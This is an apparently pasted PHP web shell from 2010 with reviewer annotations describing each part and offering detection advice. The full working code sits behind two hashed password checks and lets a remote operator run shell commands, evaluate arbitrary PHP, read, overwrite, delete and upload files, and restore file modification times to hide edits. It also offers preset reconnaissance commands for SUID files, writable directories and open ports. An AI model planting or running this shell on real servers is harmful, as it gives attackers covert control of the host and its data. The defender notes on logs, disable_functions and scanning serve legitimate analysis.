
Untitled

a guest
Nov 21st, 2010
  1. <?php
     // Reviewer annotation: this listing is a PHP web shell. Once two fixed-password
     // checks pass it runs OS commands, evaluates submitted PHP, and reads, edits,
     // deletes and uploads files for whoever sends the request.
     // set_magic_quotes_runtime() on line 3 was removed in PHP 7.0 and is called
     // unguarded, so the script as pasted only runs on older interpreters.
  2. clearstatcache ();
  3. set_magic_quotes_runtime ( 0 );
     // Defines a stub returning FALSE when ini_set() is not available, so the
     // ini_set() calls below do not abort the script.
  4. if (! function_exists ( 'ini_set' )) {
  5.     function ini_set() {
  6.         return FALSE;
  7.     }
  8. }
  9. ini_set ( 'output_buffering', 0 );
      // Tries to lift the execution time limit; $limit is only kept for the
      // status line printed later.
  10. if (@set_time_limit ( 0 ) || ini_set ( 'max_execution_time', 0 ))
  11.     $limit = 'not limited';
  12. else
  13.     $limit = get_cfg_var ( 'max_execution_time' );
      // Compatibility shim: alias the long $HTTP_*_VARS arrays when the
      // superglobals are not set.
  14. if (isset ( $HTTP_SERVER_VARS ) && ! isset ( $_SERVER )) {
  15.     $_POST = &$HTTP_POST_VARS;
  16.     $_GET = &$HTTP_GET_VARS;
  17.     $_SERVER = &$HTTP_SERVER_VARS;
  18. }
      // Strips magic-quotes escaping so posted values reach the handlers unmodified.
  19. if (@get_magic_quotes_gpc ()) {
  20.     foreach ( $_POST as $k => $v )
  21.         $_POST [$k] = stripslashes ( $v );
  22.     foreach ( $_SERVER as $k => $v )
  23.         $_SERVER [$k] = stripslashes ( $v );
  24. }
      // First gate: the request must carry a GET parameter z whose MD5 equals the
      // literal below; any other request gets an empty body from die().
      // Defender notes: the gate value travels in the query string, so requests
      // that pass it are visible in web-server access logs as "?z=..."; the
      // 32-hex digest is a fixed string that file-content scanning of the web
      // root can match on.
  25. if (! isset ( $_GET ['z'] ) || md5 ( $_GET ['z'] ) !== '95e1ebd665d6df61319c938b954f913c')
  26.     die ();
  /**
   * Run a shell command through the first available PHP process-execution
   * function, tried in the order exec, shell_exec, system, passthru.
   *
   * Every call carries the @ operator, which suppresses PHP diagnostics for that
   * call. For system() and passthru() the output is captured with output
   * buffering instead of being sent to the client directly.
   *
   * Defender notes: these four functions are the ones to list in
   * disable_functions on hosts that do not need them, and a web-server worker
   * starting a shell child process is the host-level signal this function
   * produces.
   *
   * @param string $c command line, handed to the shell unmodified
   * @return string|false|null captured output; FALSE when none of the four
   *                           functions exists
   */
  27. function execute($c) {
  28.     if (function_exists ( 'exec' )) {
  29.         @exec ( $c, $out );
  30.         return @implode ( "\n", $out );
  31.     } elseif (function_exists ( 'shell_exec' )) {
  32.         $out = @shell_exec ( $c );
  33.         return $out;
  34.     } elseif (function_exists ( 'system' )) {
  35.         @ob_start ();
  36.         @system ( $c, $ret );
  37.         $out = @ob_get_contents ();
  38.         @ob_end_clean ();
  39.         return $out;
  40.     } elseif (function_exists ( 'passthru' )) {
  41.         @ob_start ();
  42.         @passthru ( $c, $ret );
  43.         $out = @ob_get_contents ();
  44.         @ob_end_clean ();
  45.         return $out;
  46.     } else {
  47.         return FALSE;
  48.     }
  49. }
  /**
   * Return the contents of a file, HTML-escaped for display.
   *
   * file() is tried first. If it yields nothing and cURL is present, the same
   * path is fetched through a file:// URL; curl_exec() prints the body, which
   * is captured with output buffering. If neither route is available the
   * fixed text 'Could not read file!' is returned.
   *
   * NOTE(review): the scheme is assembled as 'file:/' . '/', presumably so the
   * literal "file://" never appears in the source - signatures should match on
   * curl_init() with a file scheme rather than on that exact string.
   * Defender note: a read that fails through file() may still succeed through
   * the cURL route, so a blocked direct read is not evidence the contents
   * stayed private.
   *
   * @param string $f path of the file to read
   * @return string HTML-escaped contents or the fixed error text
   */
  50. function read($f) {
  51.     $str = @file ( $f );
  52.     if ($str) {
  53.         $out = implode ( '', $str );
  54.     } elseif (function_exists ( 'curl_version' )) {
  55.         @ob_start ();
  56.         $h = @curl_init ( 'file:/' . '/' . $f );
  57.         @curl_exec ( $h );
  58.         $out = @ob_get_contents ();
  59.         @ob_end_clean ();
  60.     } else {
  61.         $out = 'Could not read file!';
  62.     }
  63.     return htmlspecialchars ( $out );
  64. }
  /**
   * Overwrite a file with the supplied content, then put back its previous
   * modification time.
   *
   * filemtime() is read before the file is opened for writing and touch()
   * re-applies that value afterwards, so a file changed through this function
   * keeps its old mtime.
   *
   * Defender note: mtime is not trustworthy when triaging a host where this
   * script ran. Compare content hashes against a known-good baseline, and on
   * POSIX filesystems look at the inode change time, which touch() cannot set
   * to a chosen value.
   *
   * @param string $f path of the file to overwrite
   * @param string $c new content
   * @return string status text describing the save and the mtime restore
   */
  65. function write($f, $c) {
          // Remember the current mtime before the write changes it.
  66.     $t = filemtime ( $f );
  67.     $fp = @fopen ( $f, 'w' );
  68.     if ($fp) {
  69.         fwrite ( $fp, $c );
  70.         fclose ( $fp );
  71.         $out = 'File saved.' . "\n";
              // Re-apply the saved mtime to the modified file.
  72.         if ($t && touch ( $f, $t )) {
  73.             $out .= 'Last modification
  74. time changed.';
  75.         } else {
  76.             $out .= 'Could not change last modification
  77. time!';
  78.         }
  79.     } else {
  80.         $out = 'Saving failed!';
  81.     }
  82.     return $out;
  83. }
  /**
   * Format a file's size for the directory listing.
   *
   * Sizes below 1024 bytes get a "b" suffix, below 1048576 a "Kb" suffix and
   * below 1073741824 an "Mb" suffix, the latter two rounded to two decimals.
   * Larger sizes fall through every branch and are returned as the raw byte
   * count from filesize().
   *
   * @param string $f path of the file
   * @return string|int formatted size with an &nbsp; separator, or the raw count
   */
  84. function file_size($f) {
  85.     $size = filesize ( $f );
  86.     if ($size < 1024)
  87.         $size = $size . '&nbsp;b';
  88.     elseif ($size < 1048576)
  89.         $size = round ( $size / 1024 * 100 ) / 100 . '&nbsp;Kb';
  90.     elseif ($size < 1073741824)
  91.         $size = round ( $size / 1048576 * 100 ) / 100 . '&nbsp;Mb';
  92.     return $size;
  93. }
  // Host profiling. Everything in this run executes on any request that passed
  // the GET gate, before the POST password in $zzz is checked: the chdir(), the
  // 'echo ssps' probe and the sysctl / id / ver commands all run even when only
  // the password form is shown.
  // Defender note: process-creation logs showing the web-server account running
  // "echo ssps", "sysctl -n kern.ostype" or "id" are a host-level indicator of
  // this script being requested.
  94. $zzz = $_POST ['zzz'];
      // Fallback when natcasesort() is missing: a plain sort() on a copy.
  95. if (! function_exists ( 'natcasesort' )) {
  96.     function natcasesort($arr) {
  97.         return sort ( $arr );
  98.     }
  99. }
       // The working directory is taken from the POST field "dir".
  100. if (! empty ( $_POST ['dir'] )) {
  101.     $dir = $_POST ['dir'];
  102.     if (! @chdir ( $dir ))
  103.         $out = 'chdir() failled!';
  104. }
  105. $dir = getcwd ();
       // A drive-letter colon in the second character marks the host as Windows.
  106. (strlen ( $dir ) > 1 && $dir [1] == ':') ? $os_type = 'win' : $os_type = 'nix';
  107. if (! $os_name = @php_uname ()) {
  108.     if (function_exists ( 'posix_uname' )) {
  109.         $os_name = posix_uname ();
  110.     } elseif ($os_name != getenv ( 'OS' )) {
  111.         $os_name = '';
  112.     }
  113. }
  114.  
       // Account the PHP process runs as, for the status line.
  115. if (function_exists ( 'posix_getpwuid' )) {
  116.     $data = posix_getpwuid ( posix_getuid () );
  117.     $user = $data ['name'] . '
  118. uid(' . $data ['uid'] . ') gid(' . $data ['gid'] . ')';
  119. } else {
  120.     $user = '';
  121. }
  122.  
  123. $safe_mode = get_cfg_var ( 'safe_mode' );
  124. $safe_mode ? $safe = 'on' : $safe = 'off';
       // Probe for working command execution; "ssps" is the marker string echoed.
  125. execute ( 'echo ssps' ) ? $execute = 'on' : $execute = 'off';
  126.  
  127. $server = getenv ( 'SERVER_SOFTWARE' );
  128. if (! $server)
  129.     $server = '---';
  130. $out = '';
  131. $tail = '';
  132. $aliases = '';
       // With safe_mode off, shell commands collect OS and user details, and
       // $aliases is filled with the preset commands offered in the drop-down.
  133. if (! $safe_mode) {
  134.     if ($os_type == 'nix') {
  135.         $os .= execute ( 'sysctl -n kern.ostype' );
  136.         $os .= execute ( 'sysctl -n
  137. kern.osrelease' );
  138.         $os .= execute ( 'sysctl -n kernel.ostype' );
  139.         $os .= execute ( 'sysctl -n kernel.osrelease' );
  140.         if (empty ( $user ))
  141.             $user = execute ( 'id' );
  142.         $aliases = array ('' => '', 'find suid files' => 'find /
  143. -type f -perm -04000 -ls', 'find sgid files' => 'find / -type f -perm
  144. -02000 -ls', 'find all writable files in current dir' => 'find . -type f
  145. -perm -2 -ls', 'find all writable directories in current dir' => 'find .
  146. -type d -perm -2 -ls', 'find all writable directories and files in
  147. current dir' => 'find . -perm -2 -ls', 'show opened ports' => 'netstat -an |
  148. grep -i listen' );
  149.     } else {
  150.         $os_name .= execute ( 'ver' );
  151.         $user .= execute ( 'echo %username%' );
  152.         $aliases = array ('' => '', 'show runing
  153. services' => 'net start', 'show process list' => 'tasklist' );
  154.     }
  155. }
  156.  
  // Page header and opening table, printed for every request that passed the
  // GET gate.
  157. print <<<here
  158.     <style>
  159. table {font:9pt Tahoma;border-color:white}
  160. input,select,file {background-color:#eeeeee}
  161. textarea {background-color:#f2f2f2}
  162. </style>
  163.     <br>
  164. <center>
  165. <table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver>
  166. <tr>
  167. <td>
  168. <form method=post>
  169. <table cellpadding=1 cellspacing=0 border=1 width=650>
  170. here;
  171.  
       // Second gate: the POST field "zzz" must hash (MD5) to the literal below.
       // On a mismatch only a single text input is rendered and the script stops,
       // so none of the action handlers that follow are reached.
       // Defender notes: this digest is a second fixed string for file-content
       // scanning; the submitted value is written back into the page unescaped.
  172. if (empty ( $zzz ) || md5 ( $zzz ) !== 'a841b9908eac74475729ae0be846d1b6') {
  173.     print <<<here
  174. <tr>
  175. <td align=center>
  176. <input type=text name=zzz size=16 value="{$zzz}">
  177. </td>
  178. </tr>
  179. </table>
  180. here;
  181.     die ();
  182. }
  183.  
  // Action dispatch: one POST field selects one action, first match wins.
  // All paths, commands and code come straight from the request with no
  // validation. Defender note: the field names used here (cmd, php, edit,
  // efile, save, remove, newdir, newfile, alias, ufile, together with zzz and
  // dir) are what to look for in captured POST bodies or WAF logs.
  184. if (! empty ( $_POST ['cmd'] )) {
           // Arbitrary shell command.
  185.     $out = execute ( $_POST ['cmd'] );
  186. }
  187.  
  188. elseif (! empty ( $_POST ['php'] )) {
           // Arbitrary PHP evaluated inside the web-server process; output is
           // captured for the results box.
  189.     ob_start ();
  190.     eval ( $_POST ['php'] );
  191.     $out = ob_get_contents ();
  192.     ob_end_clean ();
  193. }
  194.  
  195. elseif (! empty ( $_POST ['edit'] )) {
           // Loads a file into the results textarea; $tail adds hidden fields so
           // the next submit saves back to the same path.
  196.     $file = $_POST ['edit'];
  197.     $out = read ( $file );
  198.     $tail = '<input type=hidden name=dir value="' . $dir . '"><input type=hidden name=efile value="' . $file . '"><br><input type=submit>';
  199. }
  200.  
  201. elseif (! empty ( $_POST ['save'] )) {
           // Overwrites the path in "efile" with the textarea content.
  202.     $out = write ( $_POST ['efile'], $_POST ['save'] );
  203. }
  204.  
  205. elseif (! empty ( $_POST ['remove'] )) {
           // Deletes a directory with rmdir() or a file with unlink().
  206.     $obj = $_POST ['remove'];
  207.     @is_dir ( $obj ) ? $res = @rmdir ( $obj ) : $res = @unlink ( $obj );
  208.     $res ? $out = 'Removed successfully' : $out = 'Removing failed!';
  209. }
  210.  
  211. elseif (! empty ( $_POST ['newdir'] )) {
  212.     @mkdir ( $_POST ['newdir'] ) ? $out = 'Directory created.' : $out = 'Could not create directory!';
  213. }
  214.  
  215. elseif (! empty ( $_POST ['newfile'] )) {
  216.     @touch ( $_POST ['newfile'] ) ? $out = 'File created.' : $out = 'Could not create file!';
  217. }
  218.  
  219. elseif (! empty ( $_POST ['alias'] )) {
           // The "alias" value is executed as sent; it is not checked against
           // the preset list.
  220.     $out = execute ( $_POST ['alias'] );
  221. }
  222.  
  223. elseif (! empty ( $_FILES ['ufile'] ['tmp_name'] )) {
           // Upload: the file is copied into the current directory under the
           // client-supplied name (chr(47) is "/").
  224.     if (! is_uploaded_file ( $_FILES ['ufile'] ['tmp_name'] ) || @! copy ( $_FILES ['ufile'] ['tmp_name'], $dir . chr ( 47 ) . $_FILES ['ufile'] ['name'] ))
  225.         $out = 'Could not upload file';
  226.     else
  227.         $out = 'Uploaded successfully.';
  228. }
  229.  
  // Operator interface. The command row is only rendered when safe_mode is off.
  // Each form carries the second password in a hidden "zzz" field, so every
  // POST made from this page contains that value in clear text in its body.
  // Request-supplied values ($zzz, $dir) are interpolated into the markup
  // without escaping.
  230. if (! $safe_mode)
  231.     print <<<here
  232. <tr>
  233. <td>
  234. cmd
  235. </td>
  236. <td colspan=8 nowrap>
  237. <input type=text name=cmd size=97>
  238. <input type=hidden name=zzz value="{$zzz}">
  239. </td>
  240. </tr>
  241. here;
       // PHP-eval box and the file actions row (edit / remove / new_dir / new_file).
  242. print <<<here
  243. <tr>
  244. <td>
  245. php
  246. </td>
  247. <td colspan=8>
  248. <input type=text name=php size=97>
  249. </td>
  250. </tr>
  251. <tr>
  252. <td>
  253. actions
  254. </td>
  255. <td>
  256. edit
  257. </td>
  258. <td>
  259. <input type=text name=edit size=14>
  260. </td>
  261. <td>
  262. remove
  263. </td>
  264. <td>
  265. <input type=text name=remove size=14>
  266. </td>
  267. <td>
  268. new_dir
  269. </td>
  270. <td>
  271. <input type=text name=newdir size=14>
  272. </td>
  273. <td>
  274. new_file
  275. </td>
  276. <td>
  277. <input type=text name=newfile size=15>
  278. </td>
  279. </tr>
  280. here;
       // Drop-down of the preset commands held in $aliases; the option value is
       // the command text itself, which the "alias" handler executes as sent.
  281. if ($aliases) {
  282.     print <<<here
  283. <tr>
  284. <td>
  285. aliases
  286. </td>
  287. <td colspan=8>
  288. <select name=alias>
  289. here;
  290.     foreach ( $aliases as $k => $v ) {
  291.         print '<option value="' . $v . '">' . $k . '</option>';
  292.     }
  293.     print <<<here
  294.  
  295. </select>
  296. <input type=submit>
  297. </td>
  298. </tr>
  299. here;
  300. }
       // Directory field, the multipart upload form, and the status line showing
       // OS, user, server software, safe_mode, execute probe result and time limit.
  301. print <<<here
  302. <tr>
  303. <td>
  304. dir
  305. </td>
  306. <td colspan=8>
  307. <input type=text value="{$dir}" name=dir size=97>
  308. </td>
  309. </tr>
  310. </form>
  311.  
  312. <form method=post enctype=multipart/form-data>
  313. <tr>
  314. <td>
  315. upload
  316. </td>
  317. <td colspan=8>
  318. <input type=file name=ufile size=60>&nbsp;&nbsp;<input type=submit value="Upload">
  319. <input type=hidden name=dir value="{$dir}">
  320. <input type=hidden name=zzz value="{$zzz}">
  321. </td>
  322. </tr>
  323. </form>
  324. </table>
  325.  
  326. <table cellpadding=0 cellspacing=0 border=1 width=650>
  327. <form method=post>
  328. <tr valign=top>
  329. <td width=70% bgcolor=#dddddd>
  330. <b>OS:</b> {$os_name}<br>
  331. <b>User:</b> {$user}<br>
  332. <b>Server:</b> {$server}<br>
  333. <b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit}
  334. <input type=hidden name=zzz value="{$zzz}">
  335. </td>
  336. <td rowspan=2 bgcolor=#dddddd>
  337. here;
  338.  
  // Directory listing of the current working directory, colour-coded by access:
  // red = writable, blue = readable, black = neither. Entry names are printed
  // without HTML escaping.
  // Defender notes: on the non-"nix" branch writability is tested by creating
  // and deleting a file named ".ssps_tmp" inside each subdirectory, and every
  // listed file is opened in append mode to test writability. File-access
  // auditing therefore shows the web-server account touching each entry in the
  // directory on every page load; a leftover ".ssps_tmp" is an on-disk artifact.
  339. if ($dp = @openDir ( $dir )) {
  340.     $cObj = readDir ( $dp );
  341.     while ( $cObj ) {
  342.         if (@is_dir ( $cObj ))
  343.             $theDirs [] = $cObj;
  344.         elseif (@is_file ( $cObj ))
  345.             $theFiles [] = $cObj;
  346.         $cObj = readDir ( $dp );
  347.     }
  348.     closedir ( $dp );
  349. }
  350.  
  351. if (! empty ( $theDirs )) {
  352.     natcasesort ( $theDirs );
  353.     if ($os_type == 'nix') {
  354.         foreach ( $theDirs as $cDir ) {
  355.             $color = 'black';
  356.             if (is_writeable ( $cDir )) {
  357.                 $color = 'red';
  358.             } elseif (is_readable ( $cDir )) {
  359.                 $color = 'blue';
  360.             }
  361.             print "<font color=" . $color . ">&lt;" . $cDir . "&gt;</font><br>";
  362.         }
  363.     } else {
  364.         foreach ( $theDirs as $cDir ) {
                   // Write test by creating and removing a marker file.
  365.             $tmp = $cDir . '/.ssps_tmp';
  366.             if (@touch ( $tmp )) {
  367.                 $color = 'red';
  368.                 unlink ( $tmp );
  369.             } elseif (opendir ( $cDir )) {
  370.                 closedir ();
  371.                 $color = 'blue';
  372.             } else {
  373.                 $color = 'black';
  374.             }
  375.             print "<font color=" . $color . ">&lt;" . $cDir . "&gt;</font><br>";
  376.         }
  377.     }
  378. } else
           // Shown whenever no directories were collected; the message reports
           // the configured open_basedir value.
  379.     print '<br>open_basedir restriction in effect. Allowed path is ' . get_cfg_var ( 'open_basedir' );
  380.  
  381. print '<br>';
  382.  
  383. if (! empty ( $theFiles )) {
  384.     natcasesort ( $theFiles );
  385.     print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">';
  386.     foreach ( $theFiles as $cFile ) {
  387.         $size = file_size ( $cFile );
               // Append-mode open is the write test; read-mode open is the fallback.
  388.         if ($fp = @fopen ( $cFile, 'a' ))
  389.             $color = 'red';
  390.         elseif ($fp = @fopen ( $cFile, 'r' ))
  391.             $color = 'blue';
  392.         else
  393.             $color = 'black';
  394.         @fclose ( $fp );
  395.         print '<tr><td width=100%><font color=' . $color . '>' . $cFile . '</font></td><td align=left>' . $size . '</tr>';
  396.     }
  397.     print '</table>';
  398. }
  399.  
  // Results pane: $out from the selected action is placed in a textarea named
  // "save", so submitting the form sends its content to the save handler.
  // Only the file-read path escapes $out; output of the other actions is
  // inserted as-is. The "?>" on listing line 403 sits inside the heredoc and is
  // emitted as literal text, which gives a fixed string to match in responses.
  400. print <<<here
  401. </td>
  402. </tr>
  403. ?>
  404. <tr valign=top>
  405. <td align=center>
  406. <form method=post>
  407. results:
  408. <textarea name=save cols=55 rows=15>{$out}</textarea>
  409. {$tail}
  410. <input type=hidden name=zzz value="{$zzz}">
  411. </form>
  412. </td>
  413. </tr>
  414.  
  415. </table>
  416. </form>
  417. </td>
  418. </tr>
  419. </table>
  420. here;
  421. die ();